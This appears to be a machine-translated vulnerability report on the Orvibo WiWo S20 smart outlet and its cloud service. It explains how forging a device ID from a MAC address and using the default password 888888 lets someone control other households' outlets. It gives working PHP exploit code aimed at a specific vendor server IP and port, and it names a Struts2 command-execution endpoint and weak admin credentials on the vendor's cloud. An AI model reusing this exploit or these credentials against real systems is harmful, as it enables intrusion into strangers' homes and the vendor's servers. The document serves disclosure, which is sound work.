Smart Home can remotely control devices of other people's homes.

Smart Home can remotely control devices of other people's homes.

I like your design and admire the magic design of smart config,
But it's a little worse.

Oribo WiWo s20 smart Outlet

Protocol Analysis:

Control Switch
 

Uid = MAC + 0x202020202020

MAC address scan BSSID





Between Different CIDR blocks:

Attacker (counterfeit UID + default password 888888)-> cloud server

Cloud server> attacker (two UDP response packets)

Attacker (UDP operation code)-> cloud server

Cloud server (UDP operation code)-> Control Device





You only need to know the mac address and password of other people (most of them are default, do not believe the following) to control others' devices.

Code:



<? Php

$ Fp = fsockopen ('udp: // 42.121.111.208 ', 10000 );

$ Send = pack ('H * ', 'xxxxxxxx36caccf2108bc4202020202020383838383820202020202020 ');

Fwrite ($ fp, $ send );

$ Recv = fread ($ fp, 8192 );

$ Send = pack ('H * ', '686400176463accf21_bc420202020206b0000000000 ');

$ Send [18] = $ recv [18];

$ Send [22] = $ recv [23] = chr (0 )? Chr (1): chr (0 );

Fwrite ($ fp, $ send );

$ Recv = fread ($ fp, 8192 );





The combination of cloud vulnerabilities becomes terrible .........



Http://vicenter.orvibo.com: 20001/struts2 Command Execution ah



Weak administrator password. usernames are both 123456 and 123456.





So
 

Remote debug...


 

No mac address yet

Don't worry
 

I'm talking about weak passwords.

383838383838 hex 888888



You can locally send commands to the cloud for the cloud to forward to devices.

You can also directly send commands to devices on the cloud.



Of course, there are still a lot of firmware. Your infrared code and other firmware are leaked.